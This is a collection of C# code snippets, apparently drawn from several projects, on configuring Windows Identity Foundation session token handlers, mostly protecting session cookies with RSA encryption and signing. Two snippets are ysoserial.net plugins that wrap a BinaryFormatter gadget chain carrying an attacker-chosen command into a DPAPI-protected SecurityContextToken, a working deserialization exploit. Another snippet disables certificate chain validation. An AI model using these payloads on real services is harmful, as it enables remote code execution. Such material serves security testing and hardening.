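/// <summary>
/// Replaces the default session token handler with one whose cookie transforms
/// deflate, RSA-encrypt and RSA-sign the session cookie with the service
/// certificate. The previous handler registered only DeflateCookieTransform,
/// which leaves the session token compressed but neither encrypted nor
/// integrity-protected, so any client could present a self-made token.
/// </summary>
/// <param name="sender">Event source; not used.</param>
/// <param name="e">Carries the ServiceConfiguration whose handler collection is updated.</param>
/// <exception cref="InvalidOperationException">
/// No service certificate is configured; the RSA transforms cannot be built without one.
/// </exception>
private void OnServiceConfigurationCreated(object sender, ServiceConfigurationCreatedEventArgs e)
{
    var certificate = e.ServiceConfiguration.ServiceCertificate;
    if (certificate == null)
    {
        throw new InvalidOperationException("A service certificate is required to protect the session cookie; configure <serviceCertificate>.");
    }

    // Same transform chain as the other WIF samples: compress, encrypt, then sign.
    var sessionTransforms = new List<CookieTransform>(new CookieTransform[]
    {
        new DeflateCookieTransform(),
        new RsaEncryptionCookieTransform(certificate),
        new RsaSignatureCookieTransform(certificate)
    });
    var sessionHandler = new SessionSecurityTokenHandler(sessionTransforms.AsReadOnly());
    e.ServiceConfiguration.SecurityTokenHandlers.AddOrReplace(sessionHandler);
}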
/// <summary>
/// Serialises <paramref name="sessionToken"/> into <paramref name="writer"/> through the
/// session token handler returned by GetOrCreateSessionSecurityTokenHandler().
/// The dictionary writer only wraps the caller's writer and is not disposed here
/// (presumably so the caller keeps ownership of the underlying writer — confirm).
/// </summary>
/// <param name="writer">Destination for the token XML.</param>
/// <param name="sessionToken">Token to write.</param>
void WriteSessionToken(XmlWriter writer, SessionSecurityToken sessionToken)
{
    var handler = GetOrCreateSessionSecurityTokenHandler();
    var wrapped = XmlDictionaryWriter.CreateDictionaryWriter(writer);
    handler.WriteToken(wrapped, sessionToken);
}
/// <summary>
/// Plugin entry point. Builds a SecurityContextToken XML fragment whose &lt;Cookie&gt;
/// holds a BinaryFormatter stream (from TypeConfuseDelegateGenerator) that has been
/// deflated and then protected with ProtectedDataCookieTransform (DPAPI-based) — the
/// same transform pair a SessionSecurityTokenHandler uses when no custom cookie
/// transforms are configured. Defensive reading: a handler left on the default
/// transforms hands whatever DPAPI unprotects straight to BinaryFormatter, so the
/// mitigation is to bind the session cookie to the service certificate
/// (RsaEncryptionCookieTransform + RsaSignatureCookieTransform) and to keep
/// BinaryFormatter-based handlers out of reach of untrusted input.
/// </summary>
/// <param name="args">Plugin arguments, parsed by <c>options</c>; the fields <c>command</c> and <c>test</c> are set as side effects of parsing.</param>
/// <returns>The formatted XML payload as a string. On bad arguments the process exits instead of returning.</returns>
public object Run(string[] args)
{
    // `extra` (unparsed arguments) is never read; the parse is done only for its side effects.
    List <string> extra;
    try
    {
        extra = options.Parse(args);
    }
    catch (OptionException e)
    {
        Console.Write("ysoserial: ");
        Console.WriteLine(e.Message);
        Console.WriteLine("Try 'ysoserial --help' for more information.");
        System.Environment.Exit(-1);
    }
    // `payloadValue` is unused.
    String payloadValue = "";
    // Template; {0} is replaced by the Base64 of the transformed cookie bytes.
    string payload = @"<SecurityContextToken xmlns='http://schemas.xmlsoap.org/ws/2005/02/sc' Id='uuid-709ab608-2004-44d5-b392-f3c5bf7c67fb-1'> <Identifier xmlns='http://schemas.xmlsoap.org/ws/2005/02/sc'> urn:unique-id:securitycontext:1337 </Identifier> <Cookie xmlns='http://schemas.microsoft.com/ws/2006/05/security'>{0}</Cookie> </SecurityContextToken>";
    // IsNullOrWhiteSpace already covers the empty string; the first test is redundant.
    if (String.IsNullOrEmpty(command) || String.IsNullOrWhiteSpace(command))
    {
        Console.Write("ysoserial: ");
        Console.WriteLine("Incorrect plugin mode/arguments combination");
        Console.WriteLine("Try 'ysoserial --help' for more information.");
        System.Environment.Exit(-1);
    }
    byte[] serializedData = (byte[])new TypeConfuseDelegateGenerator().Generate(command, "BinaryFormatter", false);
    // Apply the default session-cookie transforms in write order: deflate, then DPAPI-protect.
    DeflateCookieTransform myDeflateCookieTransform = new DeflateCookieTransform();
    ProtectedDataCookieTransform myProtectedDataCookieTransform = new ProtectedDataCookieTransform();
    byte[] deflateEncoded = myDeflateCookieTransform.Encode(serializedData);
    byte[] encryptedEncoded = myProtectedDataCookieTransform.Encode(deflateEncoded);
    payload = String.Format(payload, Convert.ToBase64String(encryptedEncoded));
    if (test)
    {
        // PoC on how it works in practice: a default SessionSecurityTokenHandler
        // (no Configuration set) reads the token back. The catch is deliberate —
        // ReadToken is expected to throw on this handler; which exception is not
        // established here (TODO confirm).
        try
        {
            XmlReader tokenXML = XmlReader.Create(new StringReader(payload));
            SessionSecurityTokenHandler mySessionSecurityTokenHandler = new SessionSecurityTokenHandler();
            mySessionSecurityTokenHandler.ReadToken(tokenXML);
        }
        catch (Exception e)
        {
            // there will be an error!
        }
    }
    return(payload);
}
/// <summary>
/// Wires passive federation into the application with <typeparamref name="T"/> as the
/// claims authentication manager. Guarded by PassiveFederationInitialized so the
/// configuration can only run once per context.
/// </summary>
/// <param name="tokenHandler">Optional session token handler to install; null lets the configuration choose.</param>
/// <returns>This context, for chaining.</returns>
/// <exception cref="InvalidOperationException">Passive federation was already configured.</exception>
public IClaimsSetupContext MakeClaimsAware <T>(SessionSecurityTokenHandler tokenHandler = null) where T : ClaimsAuthenticationManager
{
    if (!PassiveFederationInitialized)
    {
        Application.ConfigurePassiveFederation <T>(tokenHandler);
        PassiveFederationInitialized = true;
        return this;
    }
    throw new InvalidOperationException("Application is already made claims aware");
}
/// <summary>
/// Installs a session token handler that deflates, RSA-encrypts and RSA-signs the
/// session cookie with the service certificate, replacing whatever handler was
/// registered for session tokens.
/// </summary>
/// <param name="sender">Event source; not used.</param>
/// <param name="e">Carries the ServiceConfiguration to update.</param>
public static void OnServiceConfigurationCreated(object sender, ServiceConfigurationCreatedEventArgs e)
{
    var serviceCertificate = e.ServiceConfiguration.ServiceCertificate;
    CookieTransform[] transforms =
    {
        new DeflateCookieTransform(),
        new RsaEncryptionCookieTransform(serviceCertificate),
        new RsaSignatureCookieTransform(serviceCertificate)
    };
    var handler = new SessionSecurityTokenHandler(new List<CookieTransform>(transforms).AsReadOnly());
    e.ServiceConfiguration.SecurityTokenHandlers.AddOrReplace(handler);
}
/// <summary>
/// Registers a session token handler whose cookie is compressed, encrypted and
/// signed with the service certificate (AddOrReplace swaps out the existing
/// session token handler).
/// </summary>
/// <param name="sender">Event source; not used.</param>
/// <param name="e">Carries the ServiceConfiguration to update.</param>
public static void OnServiceConfigurationCreated(object sender, ServiceConfigurationCreatedEventArgs e)
{
    var transforms = new List<CookieTransform>();
    transforms.Add(new DeflateCookieTransform());
    transforms.Add(new RsaEncryptionCookieTransform(e.ServiceConfiguration.ServiceCertificate));
    transforms.Add(new RsaSignatureCookieTransform(e.ServiceConfiguration.ServiceCertificate));
    e.ServiceConfiguration.SecurityTokenHandlers.AddOrReplace(new SessionSecurityTokenHandler(transforms.AsReadOnly()));
}
/// <summary>
/// Returns the token lifetime of the SessionSecurityTokenHandler registered for
/// SessionSecurityToken, or SessionSecurityTokenHandler.DefaultTokenLifetime when
/// no such handler is registered.
/// </summary>
TimeSpan GetSessionLifetime()
{
    var registered = _serviceConfiguration.SecurityTokenHandlers[typeof(SessionSecurityToken)] as SessionSecurityTokenHandler;
    return registered == null
        ? SessionSecurityTokenHandler.DefaultTokenLifetime
        : registered.TokenLifetime;
}
/// <summary>
/// Returns the SessionSecurityTokenHandler from a freshly created default handler
/// collection, adding a new one when the defaults do not include it. Because the
/// collection is created on every call, the returned handler is not shared with any
/// service configuration.
/// </summary>
private static SessionSecurityTokenHandler GetOrCreateSessionSecurityTokenHandler()
{
    var handlers = SecurityTokenHandlerCollection.CreateDefaultSecurityTokenHandlerCollection();
    var existing = handlers[typeof(SessionSecurityToken)] as SessionSecurityTokenHandler;
    if (existing != null)
    {
        return existing;
    }
    var created = new SessionSecurityTokenHandler();
    handlers.AddOrReplace(created);
    return created;
}
/// <summary>
/// Switches session-cookie protection from DPAPI to RSA with the service
/// certificate. The DPAPI-protected SSO cookie hit a cookie size limit and raised a
/// security exception; see
/// http://fabriccontroller.net/blog/posts/key-not-valid-for-use-in-specified-state-exception-when-working-with-the-access-control-service/
/// </summary>
/// <param name="sender">Event source; not used.</param>
/// <param name="e">Carries the FederationConfiguration whose identity handlers are updated.</param>
void OnServiceConfigurationCreated(object sender, FederationConfigurationCreatedEventArgs e)
{
    var certificate = e.FederationConfiguration.ServiceCertificate;
    var transforms = new List<CookieTransform>
    {
        new DeflateCookieTransform(),
        new RsaEncryptionCookieTransform(certificate),
        new RsaSignatureCookieTransform(certificate)
    };
    var sessionHandler = new SessionSecurityTokenHandler(transforms.AsReadOnly());
    e.FederationConfiguration.IdentityConfiguration.SecurityTokenHandlers.AddOrReplace(sessionHandler);
}
/// <summary>
/// Protects the session cookie sent to the client with the configured
/// &lt;serviceCertificate&gt;: deflate, RSA-encrypt, RSA-sign.
/// </summary>
/// <param name="sender">Event source; not used.</param>
/// <param name="e">Carries the ServiceConfiguration to update.</param>
void OnServiceConfigurationCreated(object sender, ServiceConfigurationCreatedEventArgs e)
{
    var cert = e.ServiceConfiguration.ServiceCertificate;
    var transforms = new List<CookieTransform>
    {
        new DeflateCookieTransform(),
        new RsaEncryptionCookieTransform(cert),
        new RsaSignatureCookieTransform(cert)
    };
    var handler = new SessionSecurityTokenHandler(transforms.AsReadOnly());
    e.ServiceConfiguration.SecurityTokenHandlers.AddOrReplace(handler);
}
/// <summary>
/// Replaces the session token handler with one that uses the
/// &lt;serviceCertificate&gt; to encrypt and sign the cookie sent to the client.
/// </summary>
/// <param name="sender">Event source; not used.</param>
/// <param name="e">Carries the ServiceConfiguration to update.</param>
void OnServiceConfigurationCreated(object sender, ServiceConfigurationCreatedEventArgs e)
{
    var configuration = e.ServiceConfiguration;
    List<CookieTransform> cookieTransforms = new List<CookieTransform>(3);
    cookieTransforms.Add(new DeflateCookieTransform());
    cookieTransforms.Add(new RsaEncryptionCookieTransform(configuration.ServiceCertificate));
    cookieTransforms.Add(new RsaSignatureCookieTransform(configuration.ServiceCertificate));
    SessionSecurityTokenHandler handler = new SessionSecurityTokenHandler(cookieTransforms.AsReadOnly());
    configuration.SecurityTokenHandlers.AddOrReplace(handler);
}
/// <summary>
/// Helper method to set up the wrapped secure conversation: fronts WCF's
/// secure-conversation token authenticator with a WrappedSessionSecurityTokenAuthenticator
/// so that ValidateToken returns our authorization policies and surfaces the bootstrap tokens.
/// </summary>
/// <param name="tokenRequirement">WCF's recipient-side requirement for the SCT authenticator.</param>
/// <param name="tokenHandler">Session token handler to wrap; when null one is built from _cookieTransforms.</param>
/// <param name="outOfBandTokenResolver">Receives the wrapped token cache, which replaces the resolver WCF supplied.</param>
/// <returns>The wrapping authenticator.</returns>
SecurityTokenAuthenticator SetupSecureConversationWrapper(RecipientServiceModelSecurityTokenRequirement tokenRequirement, SessionSecurityTokenHandler tokenHandler, out SecurityTokenResolver outOfBandTokenResolver)
{
    // This code requires Orcas SP1 to compile.
    // WCF expects this securityTokenAuthenticator to support:
    // 1. IIssuanceSecurityTokenAuthenticator
    // 2. ICommunicationObject is needed for this to work right.
    // WCF opens a listener in this STA that handles the nego and uses an internal class for negotiating the
    // the bootstrap tokens. We want to handle ValidateToken to return our authorization policies and surface the bootstrap tokens.

    // when sp1 is installed, use this one.
    //SecurityTokenAuthenticator sta = base.CreateSecureConversationTokenAuthenticator( tokenRequirement as RecipientServiceModelSecurityTokenRequirement, _saveBootstrapTokensInSession, out outOfBandTokenResolver );

    // use this code if SP1 is not installed
    SecurityTokenAuthenticator sta = base.CreateSecurityTokenAuthenticator(tokenRequirement, out outOfBandTokenResolver);

    SessionSecurityTokenHandler sessionTokenHandler = tokenHandler;

    //
    // If there is no SCT handler here, create one.
    //
    if (tokenHandler == null)
    {
        sessionTokenHandler = new SessionSecurityTokenHandler(_cookieTransforms, SessionSecurityTokenHandler.DefaultTokenLifetime);
        sessionTokenHandler.ContainingCollection = _securityTokenHandlerCollection;
        sessionTokenHandler.Configuration = _securityTokenHandlerCollection.Configuration;
    }

    if (ServiceCredentials != null)
    {
        // NOTE(review): a caller-supplied tokenHandler is assumed to already carry a
        // Configuration; a null Configuration would throw here — confirm at call sites.
        sessionTokenHandler.Configuration.MaxClockSkew = ServiceCredentials.IdentityConfiguration.MaxClockSkew;
    }

    SctClaimsHandler claimsHandler = new SctClaimsHandler(
        _securityTokenHandlerCollection,
        GetNormalizedEndpointId(tokenRequirement));

    WrappedSessionSecurityTokenAuthenticator wssta = new WrappedSessionSecurityTokenAuthenticator(sessionTokenHandler, sta, claimsHandler, _exceptionMapper);
    WrappedTokenCache wrappedTokenCache = new WrappedTokenCache(_tokenCache, claimsHandler);
    SetWrappedTokenCache(wrappedTokenCache, sta, wssta, claimsHandler);

    // Override the resolver filled in by base.CreateSecurityTokenAuthenticator so WCF
    // resolves SCTs through the wrapped cache.
    outOfBandTokenResolver = wrappedTokenCache;
    return(wssta);
}
/// <summary>
/// Initializes an instance of <see cref="WrappedRsaSecurityTokenAuthenticator"/>
/// </summary>
/// <param name="sessionTokenHandler">The sessionTokenHandler to wrap</param>
/// <param name="wcfSessionAuthenticator">The wcf SessionTokenAuthenticator. Must implement both IIssuanceSecurityTokenAuthenticator and ICommunicationObject.</param>
/// <param name="sctClaimsHandler">Handler that converts WCF generated IAuthorizationPolicy to <see cref="AuthorizationPolicy"/></param>
/// <param name="exceptionMapper">Converts token validation exception to SOAP faults.</param>
/// <exception cref="ArgumentNullException">Any argument is null.</exception>
/// <exception cref="InvalidOperationException">
/// <paramref name="wcfSessionAuthenticator"/> does not implement IIssuanceSecurityTokenAuthenticator (SR.ID4244)
/// or ICommunicationObject (SR.ID4245).
/// </exception>
public WrappedSessionSecurityTokenAuthenticator(SessionSecurityTokenHandler sessionTokenHandler, SecurityTokenAuthenticator wcfSessionAuthenticator, SctClaimsHandler sctClaimsHandler, ExceptionMapper exceptionMapper) : base()
{
    // Null checks first, in parameter order, so the reported argument name is the
    // first offending one.
    if (sessionTokenHandler == null)
    {
        throw DiagnosticUtility.ExceptionUtility.ThrowHelperArgumentNull("sessionTokenHandler");
    }
    if (wcfSessionAuthenticator == null)
    {
        throw DiagnosticUtility.ExceptionUtility.ThrowHelperArgumentNull("wcfSessionAuthenticator");
    }
    if (sctClaimsHandler == null)
    {
        throw DiagnosticUtility.ExceptionUtility.ThrowHelperArgumentNull("sctClaimsHandler");
    }
    if (exceptionMapper == null)
    {
        throw DiagnosticUtility.ExceptionUtility.ThrowHelperArgumentNull("exceptionMapper");
    }
    // The wrapped authenticator is consumed through two interfaces: issuance
    // (to intercept token issuance) and ICommunicationObject (to drive its lifecycle).
    // Each `as` cast is checked separately so the failure reports which one is missing.
    _issuanceSecurityTokenAuthenticator = wcfSessionAuthenticator as IIssuanceSecurityTokenAuthenticator;
    if (_issuanceSecurityTokenAuthenticator == null)
    {
        throw DiagnosticUtility.ExceptionUtility.ThrowHelperInvalidOperation(SR.GetString(SR.ID4244));
    }
    _communicationObject = wcfSessionAuthenticator as ICommunicationObject;
    if (_communicationObject == null)
    {
        throw DiagnosticUtility.ExceptionUtility.ThrowHelperInvalidOperation(SR.GetString(SR.ID4245));
    }
    _sessionTokenHandler = sessionTokenHandler;
    _sctClaimsHandler = sctClaimsHandler;
    _exceptionMapper = exceptionMapper;
}
/// <summary>
/// Installs a session token handler that deflates, RSA-encrypts and RSA-signs the
/// session cookie with the site certificate. Fails fast with a clear message when
/// no certificate is configured, rather than letting the RSA transforms throw.
/// </summary>
/// <param name="sender">Event source; not used.</param>
/// <param name="e">Carries the ServiceConfiguration to update.</param>
/// <exception cref="ApplicationException">No service certificate is configured.</exception>
private void OnServiceConfigurationCreated(object sender, ServiceConfigurationCreatedEventArgs e)
{
    var certificate = e.ServiceConfiguration.ServiceCertificate;
    if (certificate == null)
    {
        // The certificate comes from the <serviceCertificate> element in web.config:
        //   <serviceCertificate>
        //     <certificateReference x509FindType="FindByThumbprint" findValue="4653AE813BA15DFFB027E3AC147004B2D24F472B" />
        //   </serviceCertificate>
        throw new ApplicationException("No site certificate; is it set up in web.config?");
    }
    var transforms = new List<CookieTransform>
    {
        new DeflateCookieTransform(),
        new RsaEncryptionCookieTransform(certificate),
        new RsaSignatureCookieTransform(certificate)
    };
    e.ServiceConfiguration.SecurityTokenHandlers.AddOrReplace(new SessionSecurityTokenHandler(transforms.AsReadOnly()));
}
/// <summary>
/// Swaps the session token handler in <paramref name="identitySettings"/>: the one
/// currently registered (located by type) is removed and either
/// <paramref name="tokenHandler"/> or, when none is supplied, a
/// MachineKeySessionSecurityTokenHandler is added. SingleOrDefault means that more
/// than one matching handler is treated as a misconfiguration and throws
/// InvalidOperationException.
/// </summary>
/// <param name="tokenHandler">Handler to install; IsInstance() (presumably a null check — confirm) decides whether it is used.</param>
/// <param name="identitySettings">Identity configuration whose handler collection is modified.</param>
void ChangeTokenHandler(SessionSecurityTokenHandler tokenHandler, IdentityConfiguration identitySettings)
{
    var handlers = identitySettings.SecurityTokenHandlers;
    var current = handlers
        .Where(h => h.GetType().Implements <SessionSecurityTokenHandler>() || h is SessionSecurityTokenHandler)
        .SingleOrDefault();
    if (current.IsInstance())
    {
        handlers.Remove(current);
    }
    if (!tokenHandler.IsInstance())
    {
        handlers.Add(new MachineKeySessionSecurityTokenHandler());
    }
    else
    {
        handlers.Add(tokenHandler);
    }
    Logging.DebugMessage("Configured Identity token handler");
}
/// <summary>
/// Requires a site certificate and uses it to encrypt and sign the session cookie
/// (after deflating it), replacing the default session token handler.
/// </summary>
/// <param name="sender">Event source; not used.</param>
/// <param name="e">Carries the ServiceConfiguration to update.</param>
/// <exception cref="ApplicationException">No service certificate is configured in web.config.</exception>
private void OnServiceConfigurationCreated(object sender, ServiceConfigurationCreatedEventArgs e)
{
    // Make sure you've got the service certificate set up in the web.config:
    // <serviceCertificate>
    //   <certificateReference x509FindType="FindByThumbprint" findValue="4653AE813BA15DFFB027E3AC147004B2D24F472B" />
    // </serviceCertificate>
    if (e.ServiceConfiguration.ServiceCertificate == null)
    {
        throw new ApplicationException("No site certificate; is it set up in web.config?");
    }
    CookieTransform[] chain =
    {
        new DeflateCookieTransform(),
        new RsaEncryptionCookieTransform(e.ServiceConfiguration.ServiceCertificate),
        new RsaSignatureCookieTransform(e.ServiceConfiguration.ServiceCertificate)
    };
    SessionSecurityTokenHandler sessionHandler = new SessionSecurityTokenHandler(new List<CookieTransform>(chain).AsReadOnly());
    e.ServiceConfiguration.SecurityTokenHandlers.AddOrReplace(sessionHandler);
}
/// <summary>
/// Replaces the session token handler with one that deflates, RSA-encrypts and
/// RSA-signs the session cookie with the service certificate. A missing certificate
/// surfaces as ArgumentNullException from the RSA transforms; it is logged as
/// Fault.CertificateNotSpecified and swallowed, which means the previously
/// registered handler stays in place.
/// </summary>
/// <param name="sender">Sender</param>
/// <param name="e">Service Configuration Created Event Args</param>
private void OnServiceConfigurationCreated(object sender, ServiceConfigurationCreatedEventArgs e)
{
    using (new PerformanceMonitor())
    {
        try
        {
            var certificate = e.ServiceConfiguration.ServiceCertificate;
            var transforms = new List <CookieTransform>
            {
                new DeflateCookieTransform(),
                new RsaEncryptionCookieTransform(certificate),
                new RsaSignatureCookieTransform(certificate)
            };
            e.ServiceConfiguration.SecurityTokenHandlers.AddOrReplace(new SessionSecurityTokenHandler(transforms.AsReadOnly()));
        }
        catch (ArgumentNullException missingCertificate)
        {
            logger.Log(missingCertificate, EventTypes.Error, (int)Fault.CertificateNotSpecified);
        }
    }
}
/// <summary>
/// Plugin entry point. Builds a SecurityContextToken XML fragment whose &lt;Cookie&gt;
/// holds a BinaryFormatter stream (from TextFormattingRunPropertiesGenerator) that has
/// been deflated and then protected with ProtectedDataCookieTransform (DPAPI-based) —
/// the transform pair a SessionSecurityTokenHandler uses when no custom cookie
/// transforms are configured. Defensive reading: a handler left on the default
/// transforms passes whatever DPAPI unprotects to BinaryFormatter, so the mitigation
/// is to bind the session cookie to the service certificate
/// (RsaEncryptionCookieTransform + RsaSignatureCookieTransform) and to keep
/// BinaryFormatter-based handlers away from untrusted input.
/// </summary>
/// <param name="args">Plugin arguments, parsed by <c>options</c>; <c>command</c>, <c>minify</c>, <c>useSimpleType</c> and <c>test</c> are set as side effects of parsing.</param>
/// <returns>The formatted XML payload as a string (minified when <c>minify</c> is set). On bad arguments the process exits instead of returning.</returns>
public object Run(string[] args)
{
    InputArgs inputArgs = new InputArgs();
    // `extra` (unparsed arguments) is never read; parsing is done for its side effects.
    List <string> extra;
    try
    {
        extra = options.Parse(args);
        inputArgs.CmdFullString = command;
        inputArgs.Minify = minify;
        inputArgs.UseSimpleType = useSimpleType;
        inputArgs.Test = test;
    }
    catch (OptionException e)
    {
        Console.Write("ysoserial: ");
        Console.WriteLine(e.Message);
        Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information.");
        System.Environment.Exit(-1);
    }
    // `payloadValue` is unused.
    String payloadValue = "";
    // Template; {0} is replaced by the Base64 of the transformed cookie bytes.
    string payload = @"<SecurityContextToken xmlns='http://schemas.xmlsoap.org/ws/2005/02/sc'> <Identifier xmlns='http://schemas.xmlsoap.org/ws/2005/02/sc'> urn:unique-id:securitycontext:1 </Identifier> <Cookie xmlns='http://schemas.microsoft.com/ws/2006/05/security'>{0}</Cookie> </SecurityContextToken>";
    // Minified here before the {0} placeholder is filled, and again after formatting below.
    if (minify)
    {
        payload = XMLMinifier.Minify(payload, null, null);
    }
    // IsNullOrWhiteSpace already covers the empty string; the first test is redundant.
    if (String.IsNullOrEmpty(command) || String.IsNullOrWhiteSpace(command))
    {
        Console.Write("ysoserial: ");
        Console.WriteLine("Incorrect plugin mode/arguments combination");
        Console.WriteLine("Try 'ysoserial -p " + Name() + " --help' for more information.");
        System.Environment.Exit(-1);
    }
    byte[] serializedData = (byte[])new TextFormattingRunPropertiesGenerator().GenerateWithNoTest("BinaryFormatter", inputArgs);
    // Apply the default session-cookie transforms in write order: deflate, then DPAPI-protect.
    DeflateCookieTransform myDeflateCookieTransform = new DeflateCookieTransform();
    ProtectedDataCookieTransform myProtectedDataCookieTransform = new ProtectedDataCookieTransform();
    byte[] deflateEncoded = myDeflateCookieTransform.Encode(serializedData);
    byte[] encryptedEncoded = myProtectedDataCookieTransform.Encode(deflateEncoded);
    payload = String.Format(payload, Convert.ToBase64String(encryptedEncoded));
    if (test)
    {
        // PoC on how it works in practice: a default SessionSecurityTokenHandler
        // (no Configuration set) reads the token back. The bare catch is deliberate —
        // ReadToken is expected to throw on this handler; which exception is not
        // established here (TODO confirm).
        try
        {
            XmlReader tokenXML = XmlReader.Create(new StringReader(payload));
            SessionSecurityTokenHandler mySessionSecurityTokenHandler = new SessionSecurityTokenHandler();
            mySessionSecurityTokenHandler.ReadToken(tokenXML);
        }
        catch
        {
            // there will be an error!
        }
    }
    if (minify)
    {
        payload = XMLMinifier.Minify(payload, null, null);
    }
    return(payload);
}
/// <summary>
/// Records <typeparamref name="TAuth"/> as the claims authentication manager and
/// <typeparamref name="TCache"/> as the session token cache (both assigned under the
/// Triowing lock), then hands off to the non-generic ConfigurePassiveFederation.
/// </summary>
/// <param name="application">Application being configured.</param>
/// <param name="tokenHandler">Session token handler to install; null lets the configuration choose.</param>
public static void ConfigurePassiveFederation <TAuth, TCache>(this HttpApplication application, SessionSecurityTokenHandler tokenHandler)
    where TAuth : ClaimsAuthenticationManager
    where TCache : SessionSecurityTokenCache
{
    if (WebServerConfiguration.IsConfiguredAsWebFront)
    {
        Logging.DebugMessage("Stardust web requirements configured");
    }
    var authorizationType = typeof(TAuth);
    var cacheType = typeof(TCache);
    lock (Triowing)
    {
        AuthorizationManager = authorizationType;
        CahceModule = cacheType;
    }
    Logging.DebugMessage("Managers added to initializer");
    ConfigurePassiveFederation(application, tokenHandler);
}
/// <summary>
/// Sets <typeparamref name="T"/> as the claims manager and then runs the
/// non-generic ConfigurePassiveFederation.
/// </summary>
/// <param name="application">Application being configured.</param>
/// <param name="tokenHandler">Session token handler to install; null lets the configuration choose.</param>
public static void ConfigurePassiveFederation <T>(this HttpApplication application, SessionSecurityTokenHandler tokenHandler) where T : ClaimsAuthenticationManager
{
    Logging.DebugMessage("Initializing Stardust...");
    SetClaimsManager <T>();
    Logging.DebugMessage("Claims manager set");
    ConfigurePassiveFederation(application, tokenHandler);
}
/// <summary>
/// Configures passive federation for <paramref name="application"/> inside a
/// context-scoped container: creates the runtime, loads settings and the root URL,
/// disables chain validation, applies identity settings (including
/// <paramref name="tokenHandler"/>), registers the audience and initializes
/// FederatedAuthentication.FederationConfiguration if that has not happened yet.
/// </summary>
/// <param name="application">Application being configured.</param>
/// <param name="tokenHandler">Session token handler passed on to ConfigureIdentitySettings.</param>
public static void ConfigurePassiveFederation(this HttpApplication application, SessionSecurityTokenHandler tokenHandler)
{
    using (ContainerFactory.Current.ExtendScope(Scope.Context))
    {
        Logging.DebugMessage("Initializing Runtime");
        var stardustRuntime = CreateRuntime();
        Logging.DebugMessage("Runtime initialized");

        var federationSettings = GetSettings(stardustRuntime);
        Logging.DebugMessage("Settings obtained");

        var applicationRoot = GetRootUrl(stardustRuntime);
        Logging.DebugMessage("Root url obtained");

        DisableChainValidation(federationSettings);
        Logging.DebugMessage("Chain validation set");

        ConfigureIdentitySettings(federationSettings, applicationRoot, tokenHandler);
        Logging.DebugMessage("Identity settins configured");

        AddAudience(federationSettings, applicationRoot);
        Logging.DebugMessage("Audience added");

        if (FederatedAuthentication.FederationConfiguration.IsInitialized == false)
        {
            FederatedAuthentication.FederationConfiguration.Initialize();
            Logging.DebugMessage("Federated authentication initialized");
        }
        Logging.DebugMessage("Configuration completed");
    }
}
/// <summary>
/// Applies the STS settings from the environment to the identity configuration:
/// issuer, certificate validation mode, session token handler and federation
/// settings. Puts the session authentication module into reference mode when one
/// is present (IsInstance() is presumably a null check — confirm) and registers the
/// thumbprint resolver last.
/// </summary>
/// <param name="settings">Identity settings to populate from the environment.</param>
/// <param name="rootUrl">Application root URL used for the federation settings.</param>
/// <param name="tokenHandler">Session token handler handed to ChangeTokenHandler.</param>
private static void ConfigureIdentitySettings(IdentitySettings settings, string rootUrl, SessionSecurityTokenHandler tokenHandler)
{
    GetStsSettingsFromEnvironment(settings);
    var identityConfiguration = ConfigureWithExternalModules();
    SetIssuer(settings, identityConfiguration);
    SetCertificateValidationMode(settings, identityConfiguration);
    ChangeTokenHandler(tokenHandler, identityConfiguration);
    ConfigureFederationSettings(settings, rootUrl);
    var sessionModule = FederatedAuthentication.SessionAuthenticationModule;
    if (sessionModule.IsInstance())
    {
        sessionModule.IsReferenceMode = true;
    }
    ThumbprintResolver.RegisterWeb(identityConfiguration);
}
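/// <summary>
/// Installs a session token handler that deflates, RSA-encrypts and RSA-signs the
/// session cookie with the service certificate. The handler this replaces used
/// DeflateCookieTransform alone, which compresses the session token but gives it no
/// confidentiality or integrity protection, so a client-supplied token could not be
/// told apart from one the server issued.
/// </summary>
/// <param name="sender">Event source; not used.</param>
/// <param name="e">Carries the ServiceConfiguration whose handler collection is updated.</param>
/// <exception cref="InvalidOperationException">
/// No service certificate is configured; the RSA transforms need one.
/// </exception>
private void OnServiceConfigurationCreated(object sender, ServiceConfigurationCreatedEventArgs e)
{
    var serviceCertificate = e.ServiceConfiguration.ServiceCertificate;
    if (serviceCertificate == null)
    {
        throw new InvalidOperationException("A service certificate is required to protect the session cookie; configure <serviceCertificate>.");
    }

    // Same transform chain as the other WIF samples: compress, encrypt, then sign.
    var sessionTransforms = new List<CookieTransform>
    {
        new DeflateCookieTransform(),
        new RsaEncryptionCookieTransform(serviceCertificate),
        new RsaSignatureCookieTransform(serviceCertificate)
    };
    var sessionHandler = new SessionSecurityTokenHandler(sessionTransforms.AsReadOnly());
    e.ServiceConfiguration.SecurityTokenHandlers.AddOrReplace(sessionHandler);
}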